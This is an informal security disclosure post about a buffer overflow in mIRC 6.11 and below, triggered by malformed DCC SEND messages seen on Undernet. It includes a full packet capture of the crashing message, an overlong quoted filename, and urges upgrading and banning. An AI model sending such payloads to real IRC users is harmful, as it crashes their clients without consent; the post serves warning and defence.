Information and packet capture of Mirc v6.11 and below DCC SEND buffer overflow exploit which crashes the client.
b62cb9645cd0d4b5e6523993aae3f46bbb8843c464d881ef3029941da07d7097
Hi all, just camed today at work and i started sniffing a bit using ngrep
(http://www.packetfactory.net/projects/ngrep/), guess what i`ve got?
Thousand of freaks (yeah of course Undernet) using this fake DCCs, but
not only as private messages this has taken the following form
/msg #channel DCC SEND "shit....
Well i`m making this public before it will extend into a IRC virus and i
encourage all the "asl pls,10x and lamers like theese" to upgrade to
mIRC 6.12 and operators of channels should get this script
http://www.erler.org/Olathe/exploit%20fix.mrc, and of course modify it
for autoban.
(i`m too lazy to do it). Below it`s your beloved packet.
T x.x.x.x:6667 -> x.x.x.x:1927 [AP]
3a 61 77 6a 66 64 67 61 64 21 73 74 31 40 xx xx :awjfdgad!st1@xx
2e xx xx 2e xx xx xx 2e xx xx 30 20 50 52 49 56 .xx.xxx.xxx PRIV
4d 53 47 20 4f 6d 69 4b 72 4f 6e 20 3a 01 44 43 MSG OmiKrOn :.DC
43 20 53 45 4e 44 20 22 61 20 61 20 61 20 61 20 C SEND "a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a
61 20 61 20 22 20 31 30 37 39 30 39 35 38 34 38 a a " 1079095848
20 36 36 36 01 0d 0a 666...
I just cutted all the IPs just to keep it down.
Greetings #linuxsecurity (Undernet).